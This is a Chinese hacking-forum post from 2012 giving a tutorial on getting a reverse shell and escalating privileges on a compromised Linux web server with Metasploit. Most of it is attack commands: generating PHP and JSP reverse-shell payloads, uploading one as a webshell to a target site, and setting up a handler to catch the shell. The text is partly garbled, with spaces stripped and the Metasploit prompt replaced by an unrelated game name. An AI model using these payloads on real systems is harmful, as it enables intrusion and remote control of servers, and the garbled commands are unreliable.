Linux提权不能反弹Shell时利用metasploit进行提权

[复制链接]
查看312 | 回复0 | 2012-4-1 19:16:51 | 显示全部楼层 |阅读模式
1.生成WEBSHELL文件

m单机传奇>m单机传奇payloadphp/reverse_phpLHOST=你的IPLPORT=端口R>dis9.php

我的BT4是在/ROOT/目录然后吧dis9.php加才能运行

把dis9.php传进你的SHELL里例如www.dis9.com/dis9.php





2.然后M游戏设置接口模板和参数

m单机传奇>usemulti/handler//进入multi/handler接口

m单机传奇exploit(handler)>setPAYLOADphp/reverse_php//写入模块不清楚的可以先infophp/reverse_php看看介绍

m单机传奇exploit(handler)>setLHOST你的IP//生成dis9.php的LHOST的IP也就是你的IP要一样

m单机传奇exploit(handler)>setLPORT8080//同上

m单机传奇exploit(handler)>exploit//执行





3.反弹SHELL

然后访问你的dis9.php

root@bt4:linkswww.dis9.com/dis9.php

这样就会反弹一个SHELL

我们就可以继续FUCKALL



/////////////////////////////////////////////////////////////////////////////////////////////////

JSP

m单机传奇payloadjava/jsp_shell_reverse_tcpLHOST=192.168.10.1R>balckrootkit.jsp

m单机传奇>useexploit/multi/handler

m单机传奇exploit(handler)>setPAYLOADjava/jsp_shell_reverse_tcp

setPAYLOADjava/jsp_shell_reverse_tcp

m单机传奇exploit(handler)>setLHOST192.168.10.1

LHOST=>192.168.10.1

——————————————————-

这里没SET端口默认的4444
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则